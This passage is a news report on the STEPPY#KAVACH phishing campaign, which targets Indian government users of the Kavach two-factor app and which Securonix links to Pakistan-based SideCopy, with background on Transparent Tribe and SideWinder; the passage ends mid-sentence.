As long as one may recall the history, post cyber world, one will find a long list of attacks done by Pakistan and India to gather intelligence that can be used against each other.
Recently, the mandatory made two factor authentication solution (2FA) called Kavach falls a victim of malicious phishing campaign, STEPPY#KAVACH that aims at stealing credentials of Indian government employees.
As per cybersecurity group, Securonix, the threat actor has a lot of similarity with the pattern of SideCopy APT, based out of Pakistan.
The threat actor has been executing discreet attacks to steal credential by cloning Indian government’s official websites making them land on the login page where they would use the mandatory process and input their data.
As per the technical report published by Securonix, “LNK files are used to initiate code execution which eventually downloads and runs a malicious C# payload, which functions as a remote access trojan (RAT)”.
This is not entirely a new practice. Kavach based entice apps have been co-opted by another threat actor, Transparent Tribe in its attacks targeting India since the start of the year. Transparent Tribe is also known as APT36,Operation C-Major, and Mythic Leopard, a suspected Pakistan-based threat group that has been active since at least 2013, primarily targeting diplomatic, defense, and research organizations in India and Afghanistan.
It’s also known to impersonate attack chains leveraged by Indian APT groups SideWinder, a prolific nation-state group that disproportionately singles out Pakistan-based military entities, to deploy its own toolset. SideWinder which has become infamous for targeting the governments and enterprises